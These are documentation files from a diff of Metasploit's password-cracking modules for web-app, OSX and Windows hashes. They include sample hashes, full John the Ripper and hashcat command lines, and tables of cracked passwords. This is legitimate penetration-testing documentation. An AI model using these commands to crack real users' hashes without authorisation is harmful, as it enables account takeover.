+[*]    Cracking Command: /usr/bin/hashcat --session=HNDjhJcJ --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=1722 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-31439-ulynqs
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking xsha512 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=HNDjhJcJ --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=1722 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-31439-ulynqs /tmp/jtrtmp20190531-31439-1bcms0z
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type  Username          Cracked Password  Method
+ -----  ---------  --------          ----------------  ------
+ 1421   xsha       xsha_buddahh      buddahh           Wordlist
+ 1422   xsha       xsha_mama         mama              Already Cracked/POT
+ 1423   xsha       xsha_hashcat      hashcat           Wordlist
+ 1424   xsha512    xsha512_password  password          Wordlist
+ 1425   xsha512    xsha512_hashcat   hashcat           Wordlist
+
+[*] Checking PBKDF2-HMAC-SHA512 hashes already cracked...
+[*] Cracking PBKDF2-HMAC-SHA512 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=Tnilqjei --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=7100 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-31439-ulynqs
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking PBKDF2-HMAC-SHA512 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=Tnilqjei --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=7100 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-31439-ulynqs /tmp/jtrtmp20190531-31439-1bcms0z
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type           Username          Cracked Password  Method
+ -----  ---------           --------          ----------------  ------
+ 1421   xsha                xsha_buddahh      buddahh           Wordlist
+ 1422   xsha                xsha_mama         mama              Already Cracked/POT
+ 1423   xsha                xsha_hashcat      hashcat           Wordlist
+ 1424   xsha512             xsha512_password  password          Wordlist
+ 1425   xsha512             xsha512_hashcat   hashcat           Wordlist
+ 1426   PBKDF2-HMAC-SHA512  pbkdf2_hashcat    hashcat           Wordlist
+
+[*] Auxiliary module execution completed
+resource (hashes_hashcat.rb)> creds
+Credentials
+===========
+
+host  origin  service  public            private                                                                                                                                                                                                      realm  private_type        JtR Format
+----  ------  -------  ------            -------                                                                                                                                                                                                      -----  ------------        ----------
+                       xsha_buddahh      7E4F6138BE21EF6A61365A4D3270DAD24A6544EE188ED422                                                                                                                                                                    Nonreplayable hash  xsha
+                       xsha_mama         3063D72395EB1A92D9BA9B8C2DF4074A081EDD1954E6B2BA                                                                                                                                                                    Nonreplayable hash  xsha
+                       xsha_hashcat      1430823483d07626ef8be3fda2ff056d0dfd818dbfe47683                                                                                                                                                                    Nonreplayable hash  xsha
+                       xsha512_password  229499e73f6ff50fbd76fa1a0b11fe10964b51b57ee0bc7ca29a5fdccaf264e132eb682abeb40a3513a1fe26397ddcd1b5d0161e5e3ff308377994f4bed4172efcc25f8a                                                                            Nonreplayable hash  xsha512
+                       xsha512_hashcat   648742485c9b0acd786a233b2330197223118111b481abfa0ab8b3e8ede5f014fc7c523991c007db6882680b09962d16fd9c45568260531bdb34804a5e31c22b4cfeb32d                                                                            Nonreplayable hash  xsha512
+                       pbkdf2_hashcat    $ml$35460$93a94bd24b5de64d79a5e49fa372827e739f4d7b6975c752c9a0ff1e5cf72e05$752351df64dd2ce9dc9c64a72ad91de6581a15c19176266b44d98919dfa81f0f96cbcb20a1ffb400718c20382030f637892f776627d34e021bad4f81b7de8222         Nonreplayable hash  PBKDF2-HMAC-SHA512
+                       xsha_mama         mama                                                                                                                                                                                                                Password            
+                       xsha_hashcat      hashcat                                                                                                                                                                                                             Password            
+                       xsha_buddahh      buddahh                                                                                                                                                                                                             Password            
+                       xsha512_hashcat   hashcat                                                                                                                                                                                                             Password            
+                       xsha512_password  password                                                                                                                                                                                                            Password            
+                       pbkdf2_hashcat    hashcat                                                                                                                                                                                                             Password
+```

documentation/modules/auxiliary/analyze/crack_webapps.md

@@ -0,0 +1,417 @@
+## Vulnerable Application
+
+  This module attempts to use a password cracker to decode Webapps
+  based password hashes, such as:
+
+  * `atlassian` based passwords
+  * `phpass` based passwords (wordpress, joomla, phpBB3)
+  * `mediawiki` based passwords
+
+| Common    | John             | Hashcat |
+|-----------|------------------|-------- |
+| atlassian | PBKDF2-HMAC-SHA1 | 12001   |
+| mediawiki | mediawiki        | 3711    |
+| phpass    | phpass           | 400     |
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+## Verification Steps
+
+  1. Have at least one user with an `atlassian`, `mediawiki`, or `phpass` password hash in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/crack_webapps```
+  4. Do: set cracker of choice
+  5. Do: ```run```
+  6. You should hopefully crack a password.
+
+## Actions
+
+   **john**
+
+   Use john the ripper (default).
+
+   **hashcat**
+
+   Use hashcat.
+
+## Options
+
+   **ATLASSIAN**
+
+   Crack atlassian hashes. Default is `true`.
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+
+   **CRACKER_PATH**
+
+   The absolute path to the cracker executable.  Default behavior is to search `path`.
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
+   **Fork**
+
+   This option will set how many forks to use on john the ripper.  Default is `1` (no forking).
+
+   **INCREMENTAL**
+
+   Run the cracker in incremental mode.  Default is `true`
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MEDIAWIKI**
+
+   Crack mediawiki hashes. Default is `true`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **PHPASS**
+
+   Crack PHPASS hashes. Default is `true`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **SHOWCOMMAND**
+
+   Show the command being used run from the command line for debugging.  Default is `false`
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+   **WORDLIST**
+
+   Run the cracker in dictionary/wordlist mode.  Default is `true`
+
+## Scenarios
+
+### Sample Data
+
+The following is data which can be used to test integration, including adding entries
+to a wordlist and pot file to test various aspects of the cracker.
+
+```
+echo "" > /root/.msf4/john.pot
+echo "fakeV6xlcXxRM:55" >> /root/.msf4/john.pot
+echo "\$1\$O3JMY.Tw\$AdLnLjQ/5jXF9.fakegHv/:password" >> /root/.msf4/john.pot
+echo "test" > /tmp/wordlist
+echo "password" >> /tmp/wordlist
+echo "toto" >> /tmp/wordlist
+echo "hashcat" >> /tmp/wordlist
+creds add user:mediawiki_qwerty hash:$B$113$de2874e33da25313d808d2a8cbf31485 jtr:mediawiki
+creds add user:mediawiki_hashcat hash:$B$56668501$0ce106caa70af57fd525aeaf80ef2898 jtr:mediawiki
+creds add user:phpass_p_hashcat hash:$P$984478476IagS59wHZvyQMArzfx58u. jtr:phpass
+creds add user:phpass_h_hashcat hash:$H$984478476IagS59wHZvyQMArzfx58u. jtr:phpass
+creds add user:atlassian_hashcat hash:{PKCS5S2}NzIyNzM0NzY3NTIwNjI3MdDDis7wPxSbSzfFqDGf7u/L00kSEnupbz36XCL0m7wa jtr:PBKDF2-HMAC-SHA1
+creds add user:atlassian_secret hash:{PKCS5S2}/eWKocWoBMiEN6aA2SQMm56/qLdCVW0fmGF4zF3CzeyaoZUpW1tE3R/fxnYjGbza jtr:PBKDF2-HMAC-SHA1
+creds add user:atlassian_admin hash:{PKCS5S2}8WEZjkCbLWysbcbZ5PRgMbdJgJOhkzRT3y1jxOqke2z1Zr79q8ypugFQEYaMoIZt jtr:PBKDF2-HMAC-SHA1
+```
+
+### John the Ripper
+
+We'll set `ITERATION_TIMEOUT 60` for a quick crack, and `ShowCommand true` for easy debugging.
+
+```
+resource (hashes_hashcat.rb)> setg CUSTOM_WORDLIST /tmp/wordlist
+CUSTOM_WORDLIST => /tmp/wordlist
+resource (hashes_hashcat.rb)> setg ShowCommand true
+ShowCommand => true
+resource (hashes_hashcat.rb)> setg USE_DEFAULT_WORDLIST false
+USE_DEFAULT_WORDLIST => false
+resource (hashes_hashcat.rb)> setg DeleteTempFiles false
+DeleteTempFiles => false
+resource (hashes_hashcat.rb)> setg USE_CREDS false
+USE_CREDS => false
+resource (hashes_hashcat.rb)> setg USE_DB_INFO false
+USE_DB_INFO => false
+resource (hashes_hashcat.rb)> setg USE_HOSTNAMES false
+USE_HOSTNAMES => false
+resource (hashes_hashcat.rb)> setg USE_ROOT_WORDS false
+USE_ROOT_WORDS => false
+resource (hashes_hashcat.rb)> setg ITERATION_TIMEOUT 60
+ITERATION_TIMEOUT => 60
+resource (hashes_hashcat.rb)> use auxiliary/analyze/crack_webapps
+resource (hashes_hashcat.rb)> run
+[+] john Version Detected: 1.9.0-jumbo-1 OMP
+[*] Hashes Written out to /tmp/hashes_tmp20190531-3775-yc870y
+[*] Wordlist file written out to /tmp/jtrtmp20190531-3775-5tikjk
+[*] Checking PBKDF2-HMAC-SHA1 hashes already cracked...
+[*] Cracking PBKDF2-HMAC-SHA1 hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=UEKq1EAc --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=PBKDF2-HMAC-SHA1 --wordlist=/tmp/jtrtmp20190531-3775-5tikjk --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-3775-yc870y
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:03 DONE (2019-05-31 18:59) 0.2564g/s 4375p/s 8883c/s 8883C/s password11908..t1900
+Use the "--show --format=PBKDF2-HMAC-SHA1" options to display all of the cracked passwords reliably
+Session completed
+[*] Cracking PBKDF2-HMAC-SHA1 hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=UEKq1EAc --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=PBKDF2-HMAC-SHA1 --max-run-time=60 /tmp/hashes_tmp20190531-3775-yc870y
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Proceeding with single, rules:Single
+Press 'q' or Ctrl-C to abort, almost any other key for status
+2g 0:00:00:00 DONE 1/3 (2019-05-31 18:59) 50.00g/s 3175p/s 3200c/s 3200C/s atlassian_admin..Atlassianatlassian
+Use the "--show --format=PBKDF2-HMAC-SHA1" options to display all of the cracked passwords reliably
+Session completed
+[*] Cracking PBKDF2-HMAC-SHA1 hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=UEKq1EAc --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=PBKDF2-HMAC-SHA1 --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-3775-yc870y
+Using default input encoding: UTF-8
+[*] Cracking PBKDF2-HMAC-SHA1 hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=UEKq1EAc --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=PBKDF2-HMAC-SHA1 --wordlist=/tmp/jtrtmp20190531-3775-5tikjk --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-3775-yc870y
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type         Username           Cracked Password  Method
+ -----  ---------         --------           ----------------  ------
+ 1535   PBKDF2-HMAC-SHA1  atlassian_hashcat  hashcat           Single
+ 1536   PBKDF2-HMAC-SHA1  atlassian_secret   secret            Normal
+ 1537   PBKDF2-HMAC-SHA1  atlassian_admin    admin             Normal
+
+[*] Checking phpass hashes already cracked...
+[*] Cracking phpass hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=ELA5O5SC --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=phpass --wordlist=/tmp/jtrtmp20190531-3775-5tikjk --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-3775-yc870y
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+2g 0:00:00:00 DONE (2019-05-31 18:59) 100.0g/s 38400p/s 38400c/s 76800C/s test3:::..tere9
+Use the "--show --format=phpass" options to display all of the cracked passwords reliably
+Session completed
+[*] Cracking phpass hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=ELA5O5SC --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=phpass --max-run-time=60 /tmp/hashes_tmp20190531-3775-yc870y
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Proceeding with single, rules:Single
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE 1/3 (2019-05-31 18:59) 100.0g/s 19200p/s 19200c/s 19200C/s phpass_p_hashcat..tachsah_p_ssaphptachsaH
+Use the "--show --format=phpass" options to display all of the cracked passwords reliably
+Session completed
+[*] Cracking phpass hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=ELA5O5SC --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=phpass --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-3775-yc870y
+Using default input encoding: UTF-8
+[*] Cracking phpass hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=ELA5O5SC --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=phpass --wordlist=/tmp/jtrtmp20190531-3775-5tikjk --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-3775-yc870y
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type         Username           Cracked Password  Method
+ -----  ---------         --------           ----------------  ------
+ 1533   phpass            phpass_p_hashcat   hashcat           Normal
+ 1534   phpass            phpass_h_hashcat   hashcat           Single
+ 1535   PBKDF2-HMAC-SHA1  atlassian_hashcat  hashcat           Single
+ 1536   PBKDF2-HMAC-SHA1  atlassian_secret   secret            Normal
+ 1537   PBKDF2-HMAC-SHA1  atlassian_admin    admin             Normal
+
+[*] Checking mediawiki hashes already cracked...
+[*] Cracking mediawiki hashes in single mode...
+[*]    Cracking Command: /usr/sbin/john --session=D6d9Rjcl --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mediawiki --wordlist=/tmp/jtrtmp20190531-3775-5tikjk --rules=single --max-run-time=60 /tmp/hashes_tmp20190531-3775-yc870y
+Using default input encoding: UTF-8
+Warning: no OpenMP support for this hash type, consider --fork=8
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE (2019-05-31 18:59) 50.00g/s 853300p/s 1021Kc/s 1021KC/s thales1913..t1900
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking mediawiki hashes in normal mode
+[*]    Cracking Command: /usr/sbin/john --session=D6d9Rjcl --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mediawiki --max-run-time=60 /tmp/hashes_tmp20190531-3775-yc870y
+Using default input encoding: UTF-8
+Warning: no OpenMP support for this hash type, consider --fork=8
+Proceeding with single, rules:Single
+Press 'q' or Ctrl-C to abort, almost any other key for status
+1g 0:00:00:00 DONE 1/3 (2019-05-31 18:59) 100.0g/s 4800p/s 4800c/s 4800C/s mediawiki_qwerty..mediawikimediawiki_qwertymediawikimediawiki_qwerty
+Use the "--show" option to display all of the cracked passwords reliably
+Session completed
+[*] Cracking mediawiki hashes in incremental mode...
+[*]    Cracking Command: /usr/sbin/john --session=D6d9Rjcl --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mediawiki --incremental=Digits --max-run-time=60 /tmp/hashes_tmp20190531-3775-yc870y
+Using default input encoding: UTF-8
+[*] Cracking mediawiki hashes in wordlist mode...
+[*]    Cracking Command: /usr/sbin/john --session=D6d9Rjcl --nolog --config=/root/metasploit-framework/data/jtr/john.conf --pot=/root/.msf4/john.pot --format=mediawiki --wordlist=/tmp/jtrtmp20190531-3775-5tikjk --rules=wordlist --max-run-time=60 /tmp/hashes_tmp20190531-3775-yc870y
+Using default input encoding: UTF-8
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type         Username           Cracked Password  Method
+ -----  ---------         --------           ----------------  ------
+ 1531   mediawiki         mediawiki_qwerty   qwerty            Normal
+ 1532   mediawiki         mediawiki_hashcat  hashcat           Single
+ 1533   phpass            phpass_p_hashcat   hashcat           Normal
+ 1534   phpass            phpass_h_hashcat   hashcat           Single
+ 1535   PBKDF2-HMAC-SHA1  atlassian_hashcat  hashcat           Single
+ 1536   PBKDF2-HMAC-SHA1  atlassian_secret   secret            Normal
+ 1537   PBKDF2-HMAC-SHA1  atlassian_admin    admin             Normal
+
+[*] Auxiliary module execution completed
+resource (hashes_hashcat.rb)> creds
+Credentials
+===========
+
+host  origin  service  public             private                                                                    realm  private_type        JtR Format
+----  ------  -------  ------             -------                                                                    -----  ------------        ----------
+                       mediawiki_hashcat  hashcat                                                                           Password            
+                       phpass_p_hashcat   hashcat                                                                           Password            
+                       phpass_h_hashcat   hashcat                                                                           Password            
+                       atlassian_hashcat  hashcat                                                                           Password            
+                       mediawiki_qwerty   $B$113$de2874e33da25313d808d2a8cbf31485                                           Nonreplayable hash  mediawiki
+                       mediawiki_hashcat  $B$56668501$0ce106caa70af57fd525aeaf80ef2898                                      Nonreplayable hash  mediawiki
+                       phpass_p_hashcat   $P$984478476IagS59wHZvyQMArzfx58u.                                                Nonreplayable hash  phpass
+                       phpass_h_hashcat   $H$984478476IagS59wHZvyQMArzfx58u.                                                Nonreplayable hash  phpass
+                       atlassian_hashcat  {PKCS5S2}NzIyNzM0NzY3NTIwNjI3MdDDis7wPxSbSzfFqDGf7u/L00kSEnupbz36XCL0m7wa         Nonreplayable hash  PBKDF2-HMAC-SHA1
+                       atlassian_secret   {PKCS5S2}/eWKocWoBMiEN6aA2SQMm56/qLdCVW0fmGF4zF3CzeyaoZUpW1tE3R/fxnYjGbza         Nonreplayable hash  PBKDF2-HMAC-SHA1
+                       atlassian_admin    {PKCS5S2}8WEZjkCbLWysbcbZ5PRgMbdJgJOhkzRT3y1jxOqke2z1Zr79q8ypugFQEYaMoIZt         Nonreplayable hash  PBKDF2-HMAC-SHA1
+                       atlassian_secret   secret                                                                            Password            
+                       atlassian_admin    admin                                                                             Password            
+                       mediawiki_qwerty   qwerty                                                                            Password
+```
+
+### Hashcat
+
+We'll set `ITERATION_TIMEOUT 60` for a quick crack, and `ShowCommand true` for easy debugging.
+
+```
+resource (hashes_hashcat.rb)> setg CUSTOM_WORDLIST /tmp/wordlist
+CUSTOM_WORDLIST => /tmp/wordlist
+resource (hashes_hashcat.rb)> setg ShowCommand true
+ShowCommand => true
+resource (hashes_hashcat.rb)> setg USE_DEFAULT_WORDLIST false
+USE_DEFAULT_WORDLIST => false
+resource (hashes_hashcat.rb)> setg DeleteTempFiles false
+DeleteTempFiles => false
+resource (hashes_hashcat.rb)> setg USE_CREDS false
+USE_CREDS => false
+resource (hashes_hashcat.rb)> setg USE_DB_INFO false
+USE_DB_INFO => false
+resource (hashes_hashcat.rb)> setg USE_HOSTNAMES false
+USE_HOSTNAMES => false
+resource (hashes_hashcat.rb)> setg USE_ROOT_WORDS false
+USE_ROOT_WORDS => false
+resource (hashes_hashcat.rb)> setg ITERATION_TIMEOUT 60
+ITERATION_TIMEOUT => 60
+resource (hashes_hashcat.rb)> use auxiliary/analyze/crack_webapps
+resource (hashes_hashcat.rb)> set action hashcat
+action => hashcat
+resource (hashes_hashcat.rb)> run
+[+] hashcat Version Detected: v5.1.0
+[*] Hashes Written out to /tmp/hashes_tmp20190531-3903-kn244m
+[*] Wordlist file written out to /tmp/jtrtmp20190531-3903-r8ligw
+[*] Checking PBKDF2-HMAC-SHA1 hashes already cracked...
+[*] Cracking PBKDF2-HMAC-SHA1 hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=hWnnDYym --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=12001 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-3903-kn244m
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking PBKDF2-HMAC-SHA1 hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=hWnnDYym --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=12001 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-3903-kn244m /tmp/jtrtmp20190531-3903-r8ligw
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type         Username           Cracked Password  Method
+ -----  ---------         --------           ----------------  ------
+ 1549   PBKDF2-HMAC-SHA1  atlassian_hashcat  hashcat           Wordlist
+
+[*] Checking phpass hashes already cracked...
+[*] Cracking phpass hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=dZ7kuaal --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=400 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-3903-kn244m
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking phpass hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=dZ7kuaal --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=400 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-3903-kn244m /tmp/jtrtmp20190531-3903-r8ligw
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type         Username           Cracked Password  Method
+ -----  ---------         --------           ----------------  ------
+ 1547   phpass            phpass_p_hashcat   hashcat           Wordlist
+ 1549   PBKDF2-HMAC-SHA1  atlassian_hashcat  hashcat           Wordlist
+
+[*] Checking mediawiki hashes already cracked...
+[*] Cracking mediawiki hashes in incremental mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=nasHCHQx --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=3711 --increment --increment-max=4 --attack-mode=3 --runtime=60 /tmp/hashes_tmp20190531-3903-kn244m
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[*] Cracking mediawiki hashes in wordlist mode...
+[*]    Cracking Command: /usr/bin/hashcat --session=nasHCHQx --logfile-disable --potfile-path=/root/.msf4/john.pot --hash-type=3711 --attack-mode=0 --runtime=60 /tmp/hashes_tmp20190531-3903-kn244m /tmp/jtrtmp20190531-3903-r8ligw
+nvmlDeviceGetFanSpeed(): Not Supported
+
+[+] Cracked Hashes
+==============
+
+ DB ID  Hash Type         Username           Cracked Password  Method
+ -----  ---------         --------           ----------------  ------
+ 1546   mediawiki         mediawiki_hashcat  hashcat           Wordlist
+ 1547   phpass            phpass_p_hashcat   hashcat           Wordlist
+ 1549   PBKDF2-HMAC-SHA1  atlassian_hashcat  hashcat           Wordlist
+
+[*] Auxiliary module execution completed
+resource (hashes_hashcat.rb)> creds
+Credentials
+===========
+
+host  origin  service  public             private                                                                    realm  private_type        JtR Format
+----  ------  -------  ------             -------                                                                    -----  ------------        ----------
+                       phpass_h_hashcat   $H$984478476IagS59wHZvyQMArzfx58u.                                                Nonreplayable hash  phpass
+                       mediawiki_qwerty   $B$113$de2874e33da25313d808d2a8cbf31485                                           Nonreplayable hash  mediawiki
+                       mediawiki_hashcat  $B$56668501$0ce106caa70af57fd525aeaf80ef2898                                      Nonreplayable hash  mediawiki
+                       mediawiki_hashcat  hashcat                                                                           Password            
+                       atlassian_admin    {PKCS5S2}8WEZjkCbLWysbcbZ5PRgMbdJgJOhkzRT3y1jxOqke2z1Zr79q8ypugFQEYaMoIZt         Nonreplayable hash  PBKDF2-HMAC-SHA1
+                       phpass_p_hashcat   hashcat                                                                           Password            
+                       atlassian_hashcat  hashcat                                                                           Password            
+                       atlassian_hashcat  {PKCS5S2}NzIyNzM0NzY3NTIwNjI3MdDDis7wPxSbSzfFqDGf7u/L00kSEnupbz36XCL0m7wa         Nonreplayable hash  PBKDF2-HMAC-SHA1
+                       atlassian_secret   {PKCS5S2}/eWKocWoBMiEN6aA2SQMm56/qLdCVW0fmGF4zF3CzeyaoZUpW1tE3R/fxnYjGbza         Nonreplayable hash  PBKDF2-HMAC-SHA1
+                       phpass_p_hashcat   $P$984478476IagS59wHZvyQMArzfx58u.                                                Nonreplayable hash  phpass
+```

documentation/modules/auxiliary/analyze/crack_windows.md

@@ -0,0 +1,354 @@
+## Vulnerable Application
+
+  This module attempts to use a password cracker to decode Windows
+  based password hashes, such as:
+
+  * `LANMAN` based passwords
+  * `NTLM` based passwords
+
+| Common | John     | Hashcat |
+|--------|----------|---------|
+| lanman | lm       | 3000    |
+| ntlm   | nt       | 1000    |
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+## Verification Steps
+
+  1. Have at least one user with an `ntlm`, or `lanman` password hash in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/crack_windows```
+  4. Do: set cracker of choice
+  5. Do: ```run```
+  6. You should hopefully crack a password.
+
+## Actions
+
+   **john**
+
+   Use john the ripper (default).
+
+   **hashcat**
+
+   Use hashcat.
+
+## Options
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CRACKER_PATH**
+
+   The absolute path to the cracker executable.  Default behavior is to search `path`.
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **DeleteTempFiles**
+
+   This option will prevent deletion of the wordlist and file containing hashes.  This may be useful for
+   running the hashes through john if it wasn't cracked, or for debugging. Default is `false`.
+
+   **Fork**
+
+   This option will set how many forks to use on john the ripper.  Default is `1` (no forking).
+
+   **INCREMENTAL**
+
+   Run the cracker in incremental mode.  Default is `true`
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **LANMAN**
+
+   Crack LANMAN hashes.  Default is `true`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **NTLM**
+
+   Crack NTLM hashes.  Default is `true`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **SHOWCOMMAND**
+
+   Show the command being used run from the command line for debugging.  Default is `false`
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+   **WORDLIST**
+
+   Run the cracker in dictionary/wordlist mode.  Default is `true`
+
+## Scenarios
+
+### Sample Data
+
+The following is data which can be used to test integration, including adding entries
